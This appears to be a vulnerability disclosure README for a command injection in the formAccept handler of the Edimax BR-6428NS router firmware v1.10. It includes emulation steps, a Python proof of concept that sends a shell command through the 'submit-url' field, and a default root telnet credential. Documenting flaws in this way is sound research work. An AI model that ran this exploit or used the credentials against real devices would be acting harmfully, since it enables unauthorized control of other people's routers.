Skip to content

Latest commit

 

History

History
49 lines (29 loc) · 1.05 KB

Readme.md

File metadata and controls

49 lines (29 loc) · 1.05 KB

Command Injection

Command injection without any limitations

Firmware

Wireless: Edimax home Wireless Routers N300

Firmware Version: BR-6428NS_v4_1.10

You can download Firmware at this website and use FirmAE to simulate the router environment.

FirmAE command: ./run.sh -r v4 BR-6428NS_v4_1.10.bin(This will take a while, please be patient:)

image-20230428095433531

Description

The vulnerability was found in /bin/webs.

Function is formAccept

image-20230428111649201

poc

python

import requests

command = "touch /tmp/Swe3ty3"

url = "http://192.168.2.1/goform/formAccept"
data = {
	"submit-url":command
}

r = requests.post(url,data=data)
print(r.text)

use root/edimaxens telnet to the router

telnet 192.168.2.1

image-20230428111933476